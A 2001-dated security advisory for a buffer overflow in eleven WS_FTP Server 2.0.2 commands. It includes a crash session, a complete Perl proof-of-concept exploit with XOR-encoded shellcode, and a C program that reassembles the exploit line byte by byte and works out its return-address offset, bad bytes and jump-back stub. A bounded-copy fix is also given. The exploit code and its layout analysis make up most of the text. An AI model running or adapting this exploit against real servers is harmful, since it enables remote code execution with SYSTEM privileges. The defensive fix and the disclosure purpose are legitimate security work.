WS_FTP Server buffer overflow

Published: 2001-07-27
Updated: 2001-07-27
Severity: medium
Threat: remote denial of service (the description below shows the overflow is also usable for code execution as SYSTEM)
Bug class: input validation error
Exploitation: server side
Affected systems: WS_FTP Server version 2.0.2

Description

WS_FTP Server is an FTP server for Windows NT/2000. The following commands contain a buffer overflow:

* DELE
* MDTM
* MLST
* MKD
* RMD
* RNFR
* RNTO
* SIZE
* STAT
* XMKD
* XRMD

A successful overflow allows arbitrary code to run with SYSTEM privileges. In general, supplying more than 478 bytes of argument to one of these commands is enough to overwrite EIP. The session below (authenticated as ftp/ftp, DELE with a long run of 'A') shows both the saved EBP and the return address replaced by 0x41414141:

C:\tools\web>nc -nvv 127.0.0.1 21
(UNKNOWN) [127.0.0.1] 21 (?) open
220-helig2 X2 WS_FTP Server 2.0.2.EVAL (48732520)
220-Tue Jun 19 14:00:21 2001
220-30 days remaining on evaluation.
220 helig2 X2 WS_FTP Server 2.0.2.EVAL (48732520)
user ftp
331 Password required
pass ftp
230 user logged in
DELE AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Access violation - code c0000005 (first chance)
eax=000000ea ebx=0067c278 ecx=000000ea edx=00000002 esi=0067c278 edi=77fca3e0
eip=41414141 esp=0104df88 ebp=41414141 iopl=0         nv up ei pl zr na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00010246

Test code

#!/usr/local/bin/perl
##############################################################
#
# WS_FTP Server 2.0.2 DELE proof-of-concept exploit
# By andreas@defcom.com and janne@defcom.com (C)2001
#
##############################################################
use strict;
use warnings;
use Socket;

my $login = "ftp";   # username
my $pass  = "ftp";   # password
##############################################################
my $ARGC = @ARGV;
if ($ARGC != 1) {
    print "WS_FTP server 2.0.2 DELE proof-of-concept exploit\n";
    print "It creates a file named defcom.iyd in the c-root\n";
    print "(C)2001 andreas\@defcom.com\n";
    print "Usage: $0 <host>\n";
    print "Example: $0 127.0.0.1\n";
    exit;
}

my ($remote, $port, $iaddr, $paddr, $proto);
$remote = $ARGV[0];
$port   = "21";
$iaddr  = inet_aton($remote)         or die "Error: $!";
$paddr  = sockaddr_in($port, $iaddr) or die "Error: $!";
$proto  = getprotobyname('tcp')      or die "Error: $!";
socket(SOCK, PF_INET, SOCK_STREAM, $proto) or die "Error: $!";
connect(SOCK, $paddr)                or die "Error: $!";
sleep(1);

# Log in first; the overflow is in a post-authentication command.
# Lines end in bare LF, which the server accepts (see the nc session above).
my $msg = "user $login\n";
send(SOCK, $msg, 0) or die "Cannot send query: $!";
$msg = "pass $pass\n";
sleep(1);
send(SOCK, $msg, 0) or die "Cannot send query: $!";

# Payload: a 24-byte decoder (XORs the bytes after it with 0x95) followed by
# the encoded shellcode.
my $sploit = "\x8b\xd8\x8b\xf8\x83\xc0\x18\x33\xc9\x66\xb9\x42\x81\x66\x81\xf1\x80\x80\x80\x30\x95\x40\xe2\xfa\xde\x1e\x76";
$sploit .= "\x1e\x7e\x2e\x95\x6f\x95\x95\xc6\xfd\xd5\x95\x95\x95\x2b\x49\x81\xd0\x95\x6a\x83\x96\x56\x1e\x75\x1e\x7d\xa6\x55";
$sploit .= "\xc5\xfd\x15\x95\x95\x95\xff\x97\xc5\xc5\xfd\x95\x95\x95\x85\x14\x52\x59\x94\x95\x95\xc2\x2b\xb1\x80\xd0\x95";
$sploit .= "\x6a\x83\xc5\x2b\x6d\x81\xd0\x95\x6a\x83\xa6\x55\xc5\x2b\x85\x83\xd0\x95\x6a\x83";

# Argument layout: payload, 0xd4 padding up to 460 bytes, 14 more encoded
# bytes, the 4-byte return address, 16 bytes of 0xd4, and a stub that
# computes an address relative to ESP and jumps back into the buffer.
$msg = "dele " . $sploit . "\xd4" x (460 - length($sploit)) . "\xf6\xaf\xc9\xf1\xf0\xf3\xf6\xfa\xf8\xbb\xfc\xec\xf1\x95";
$msg = $msg . "\xab\xa3\x54\x77" . "\xd4" x 16 . "\x8b\xc4\x83\xe8\x7f\x83\xe8\x7f\x83\xe8\x7f\x83\xe8\x71\xff\xe0\n";
print $msg;
sleep(1);
send(SOCK, $msg, 0) or die "Cannot send query: $!";
exit;

Solution

None yet.

Related information

andreas at defcom.com
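The advisory shows no server code, so the following is an added example, not WS_FTP Server source: the bug class the description above reports (a command argument copied with strcpy() into a fixed-size stack buffer), next to a bounded handler that rejects over-long arguments with a 501 before any copy, and a small dispatcher that routes all eleven listed commands through that bounded handler. The 478-byte buffer size, the function names and the reply texts are assumptions for illustration.

```c
/* Added example, not WS_FTP Server source.  ARG_BUF, LINE_MAX, the
 * function names and reply texts are assumptions for illustration. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define ARG_BUF  478    /* assumed size of the per-command path buffer */
#define LINE_MAX 1024   /* assumed longest command line the server reads */

/* Vulnerable pattern.  An argument of ARG_BUF bytes or more runs past 'path'
 * into the saved EBP and the return address (compare ebp=41414141 and
 * eip=41414141 in the crash dump above).  Shown for the defect only; it is
 * called below with a short argument. */
static int dele_vulnerable(const char *arg)
{
    char path[ARG_BUF];
    strcpy(path, arg);          /* BUG: no length check before the copy */
    return (int)strlen(path);
}

/* Hardened handler: the length is checked against the buffer before any
 * copy and the copy itself is bounded.  Returns the FTP reply code. */
static int path_cmd_hardened(const char *verb, const char *arg,
                             char *reply, size_t reply_cap)
{
    char path[ARG_BUF];
    size_t n = strlen(arg);
    if (n == 0 || n >= sizeof path) {
        snprintf(reply, reply_cap, "501 %s: missing or over-long argument", verb);
        return 501;
    }
    memcpy(path, arg, n + 1);   /* n < sizeof path, so the NUL fits too */
    /* file-system work omitted; success is assumed for the example */
    snprintf(reply, reply_cap, "250 %s %s", verb, path);
    return 250;
}

/* The eleven commands listed in the advisory all carry a path argument and
 * go through the same bounded handler. */
static const char *const PATH_CMDS[] = {
    "DELE", "MDTM", "MLST", "MKD", "RMD", "RNFR", "RNTO", "SIZE", "STAT",
    "XMKD", "XRMD", NULL
};

/* Split "VERB arg\r\n" into verb and argument and dispatch. */
static int handle_line(const char *line, char *reply, size_t reply_cap)
{
    char buf[LINE_MAX];
    size_t n = strlen(line);
    if (n >= sizeof buf) {      /* refuse absurd lines before parsing them */
        snprintf(reply, reply_cap, "500 Line too long");
        return 500;
    }
    memcpy(buf, line, n + 1);
    buf[strcspn(buf, "\r\n")] = '\0';

    char *verb = buf;
    char *arg  = strchr(buf, ' ');
    if (arg) { *arg++ = '\0'; while (*arg == ' ') arg++; }
    else     { arg = buf + strlen(buf); }
    for (char *p = verb; *p; p++) *p = (char)toupper((unsigned char)*p);

    for (int i = 0; PATH_CMDS[i]; i++)
        if (strcmp(verb, PATH_CMDS[i]) == 0)
            return path_cmd_hardened(verb, arg, reply, reply_cap);
    snprintf(reply, reply_cap, "502 Command not implemented");
    return 502;
}

/* Reply code for a complete command line. */
int reply_code_for(const char *line)
{
    char reply[128];
    return handle_line(line, reply, sizeof reply);
}

/* Reply code for "<verb> " + n bytes of 'A' + CRLF, the advisory's test input. */
int reply_code_for_repeated(const char *verb, size_t n)
{
    char line[LINE_MAX];
    size_t vlen = strlen(verb);
    if (vlen + 1 + n + 3 > sizeof line) n = sizeof line - vlen - 4;
    memcpy(line, verb, vlen);
    line[vlen] = ' ';
    memset(line + vlen + 1, 'A', n);
    memcpy(line + vlen + 1 + n, "\r\n", 3);
    return reply_code_for(line);
}

int main(void)
{
    char reply[128];
    printf("vulnerable handler, short input: %d\n", dele_vulnerable("short.txt"));
    handle_line("DELE short.txt\r\n", reply, sizeof reply);
    puts(reply);
    printf("DELE with 500 x 'A' -> %d (rejected, no crash)\n",
           reply_code_for_repeated("DELE", 500));
    return 0;
}
```

The check that matters is the one in path_cmd_hardened: the argument length is compared with the destination buffer before a single byte is copied, so the 478-byte boundary the advisory reports becomes a 501 reply instead of a return-address overwrite. Applying the same handler to every listed command closes all eleven at once; patching DELE alone would leave MDTM, SIZE and the rest open.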
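As an added example, not the advisory's own PoC, the C below reconstructs the DELE line the Perl script above sends and checks what a practitioner would verify before pointing it at a host: the byte index at which the return address lands, that no byte the FTP line reader or C string handling stops at (NUL, CR, LF) occurs before the final LF, and what the 24-byte decoder at the front of the payload produces when it XORs the 450 bytes after it with 0x95. Every byte string is copied from the script; the bad-byte set and the names used here are assumptions.

```c
/* Added example, not the advisory's PoC: the DELE line the Perl script
 * builds, reassembled in C so its layout can be checked offline. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define PREFIX       "dele "
#define PREFIX_LEN   5
#define PAD_TO       460   /* "\xd4" x (460 - length($sploit)) */
#define DECODER_LEN  24    /* mov ebx,eax; mov edi,eax; add eax,0x18; xor ecx,ecx;
                              mov cx,0x8142; xor cx,0x8080; L: xor byte [eax],0x95;
                              inc eax; loop L */
#define DECODE_COUNT 450   /* 0x8142 ^ 0x8080 */
#define KEY          0x95
#define RET_OFFSET   (PREFIX_LEN + PAD_TO + 14)       /* 479: index of the return address */
#define LINE_LEN     (RET_OFFSET + 4 + 16 + 16 + 1)   /* 516 */

/* $sploit: the 24-byte decoder followed by the XOR-0x95-encoded shellcode. */
static const uint8_t SPLOIT[] = {
    0x8b,0xd8,0x8b,0xf8,0x83,0xc0,0x18,0x33,0xc9,0x66,0xb9,0x42,0x81,0x66,
    0x81,0xf1,0x80,0x80,0x80,0x30,0x95,0x40,0xe2,0xfa,0xde,0x1e,0x76,0x1e,
    0x7e,0x2e,0x95,0x6f,0x95,0x95,0xc6,0xfd,0xd5,0x95,0x95,0x95,0x2b,0x49,
    0x81,0xd0,0x95,0x6a,0x83,0x96,0x56,0x1e,0x75,0x1e,0x7d,0xa6,0x55,0xc5,
    0xfd,0x15,0x95,0x95,0x95,0xff,0x97,0xc5,0xc5,0xfd,0x95,0x95,0x95,0x85,
    0x14,0x52,0x59,0x94,0x95,0x95,0xc2,0x2b,0xb1,0x80,0xd0,0x95,0x6a,0x83,
    0xc5,0x2b,0x6d,0x81,0xd0,0x95,0x6a,0x83,0xa6,0x55,0xc5,0x2b,0x85,0x83,
    0xd0,0x95,0x6a,0x83
};
/* The 14 bytes placed directly in front of the return address. */
static const uint8_t TAIL_ENC[14] = {
    0xf6,0xaf,0xc9,0xf1,0xf0,0xf3,0xf6,0xfa,0xf8,0xbb,0xfc,0xec,0xf1,0x95
};
static const uint8_t RET_ADDR[4] = { 0xab,0xa3,0x54,0x77 };   /* 0x7754a3ab, little-endian */
/* mov eax,esp; sub eax,0x7f; sub eax,0x7f; sub eax,0x7f; sub eax,0x71; jmp eax */
static const uint8_t JMP_BACK[16] = {
    0x8b,0xc4,0x83,0xe8,0x7f,0x83,0xe8,0x7f,0x83,0xe8,0x7f,0x83,0xe8,0x71,0xff,0xe0
};

/* Assemble the line exactly as the Perl script does; returns its length. */
size_t build_dele_line(uint8_t *out, size_t cap)
{
    size_t n = 0;
    if (cap < LINE_LEN || sizeof SPLOIT > (size_t)PAD_TO) return 0;
    memcpy(out + n, PREFIX, PREFIX_LEN);            n += PREFIX_LEN;
    memcpy(out + n, SPLOIT, sizeof SPLOIT);         n += sizeof SPLOIT;
    memset(out + n, 0xd4, PAD_TO - sizeof SPLOIT);  n += PAD_TO - sizeof SPLOIT;
    memcpy(out + n, TAIL_ENC, sizeof TAIL_ENC);     n += sizeof TAIL_ENC;
    memcpy(out + n, RET_ADDR, sizeof RET_ADDR);     n += sizeof RET_ADDR;
    memset(out + n, 0xd4, 16);                      n += 16;
    memcpy(out + n, JMP_BACK, sizeof JMP_BACK);     n += sizeof JMP_BACK;
    out[n++] = '\n';
    return n;
}

size_t dele_line_length(void)
{
    uint8_t line[LINE_LEN];
    return build_dele_line(line, sizeof line);
}

/* The return address as the CPU reads it off the stack (little-endian). */
uint32_t return_address_in_line(void)
{
    uint8_t line[LINE_LEN];
    if (build_dele_line(line, sizeof line) == 0) return 0;
    const uint8_t *p = line + RET_OFFSET;
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Count bytes the FTP command reader or C string handling would stop at
 * (assumed bad-byte set: NUL, LF, CR), ignoring the terminating LF. */
size_t bad_bytes_in_line(void)
{
    uint8_t line[LINE_LEN];
    size_t len = build_dele_line(line, sizeof line), bad = 0;
    for (size_t i = 0; i + 1 < len; i++)
        if (line[i] == 0x00 || line[i] == 0x0a || line[i] == 0x0d) bad++;
    return bad;
}

/* What the decoder does at run time, assuming EAX points at the payload
 * start: XOR DECODE_COUNT bytes beginning DECODER_LEN bytes in.  That range
 * ends exactly at RET_OFFSET, so the 14 tail bytes are decoded as well and
 * are compared here, as a C string, with 'expect'. */
int decoded_tail_matches(const char *expect)
{
    uint8_t line[LINE_LEN];
    if (build_dele_line(line, sizeof line) == 0) return 0;
    uint8_t *p = line + PREFIX_LEN + DECODER_LEN;
    for (size_t i = 0; i < DECODE_COUNT; i++) p[i] ^= KEY;
    return strcmp((const char *)line + RET_OFFSET - 14, expect) == 0;
}

size_t decoder_range_end(void)  { return PREFIX_LEN + DECODER_LEN + DECODE_COUNT; }
int    jump_back_distance(void) { return 0x7f + 0x7f + 0x7f + 0x71; }

int main(void)
{
    printf("line %zu bytes, return address 0x%08x at index %d, decoder stops at %zu\n",
           dele_line_length(), return_address_in_line(), RET_OFFSET, decoder_range_end());
    printf("bad bytes: %zu, jmp-back distance: %d, tail decodes to c:\\defcom.iyd: %s\n",
           bad_bytes_in_line(), jump_back_distance(),
           decoded_tail_matches("c:\\defcom.iyd") ? "yes" : "no");
    return 0;
}
```

Three things fall out of running it. The return address sits 474 bytes into the argument (byte 479 of the line counting "dele "), which is the region the advisory's 0x41414141 crash identifies. The decoder's 450-byte range ends precisely at that return address, and under XOR 0x95 the 0xd4 filler becomes 0x41 (inc ecx, a harmless one-byte instruction) while the 14 bytes in front of the return address become the NUL-terminated string c:\defcom.iyd, which is how the script keeps a NUL out of the command line yet still hands the shellcode a C string; that matches the "creates a file named defcom.iyd in the c-root" usage text. The jump-back stub subtracts 494 from ESP and jumps there, which only works if ESP at that moment is 494 bytes past the payload start; whether it is depends on the server's stack frame and on what 0x7754a3ab points to, and the advisory states neither, so that is the value to confirm in a debugger before expecting the PoC to do more than crash the service.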